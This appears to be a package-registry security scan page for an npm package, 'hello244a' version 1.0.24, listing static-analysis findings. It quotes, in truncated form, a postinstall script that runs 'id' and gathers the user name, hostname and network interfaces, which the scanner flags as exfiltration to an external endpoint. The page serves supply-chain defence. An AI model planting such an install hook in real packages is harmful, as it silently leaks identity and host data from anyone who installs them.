registry  /  hello244a  /  1.0.24

hello244a@1.0.24

⚠ Under review

Static Scan Results

scanned 4h ago · by rust-scanner

Static analysis flagged 7 finding(s) at 86.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
High-risk behavior combination matched malicious policy.

Decision evidence

public snapshot
Behavioral surface
SourceNo risky source behavior triggered.
Supply chainNo supply-chain packaging signals triggered.
Manifest
NoLicense
scanned 0 file(s), 0 B of source

Source & flagged code

5 flagged · loading source
package.jsonView file
scripts.postinstall = node -e "const os=require('os'),https=require('https'),{execSync}=require('child_process');let d={user:process.env.USER,id:execSync('id').toString(),host:os.hostname(),ips:os.netwo...
Critical
Red Install Lifecycle Script

Install-time lifecycle script matches a deterministic static-gate block pattern.

package.jsonView on unpkg
scripts.postinstall = node -e "const os=require('os'),https=require('https'),{execSync}=require('child_process');let d={user:process.env.USER,id:execSync('id').toString(),host:os.hostname(),ips:os.netwo...
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
package.json#scripts.postinstallView file
1"const os=require('os'),https=require('https'),{execSync}=require('child_process');let d={user:process.env.USER,id:execSync('id').toString(),host:os.hostname(),ips:os.networkInterf...
Critical
Command Output Exfiltration

Source executes local commands and sends command output to an external endpoint.

package.json#scripts.postinstallView on unpkg · L1
1"const os=require('os'),https=require('https'),{execSync}=require('child_process');let d={user:process.env.USER,id:execSync('id').toString(),host:os.hostname(),ips:os.networkInterf...
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

package.json#scripts.postinstallView on unpkg · L1
1"const os=require('os'),https=require('https'),{execSync}=require('child_process');let d={user:process.env.USER,id:execSync('id').toString(),host:os.hostname(),ips:os.networkInterf...
High
Host Fingerprint Exfiltration

Source collects local host identity data and sends it to an external endpoint.

package.json#scripts.postinstallView on unpkg · L1

Findings

2 Critical3 High2 Low
CriticalRed Install Lifecycle Scriptpackage.json
CriticalCommand Output Exfiltrationpackage.json#scripts.postinstall
HighInstall Time Lifecycle Scriptspackage.json
HighSame File Env Network Executionpackage.json#scripts.postinstall
HighHost Fingerprint Exfiltrationpackage.json#scripts.postinstall
LowScripts Present
LowNo License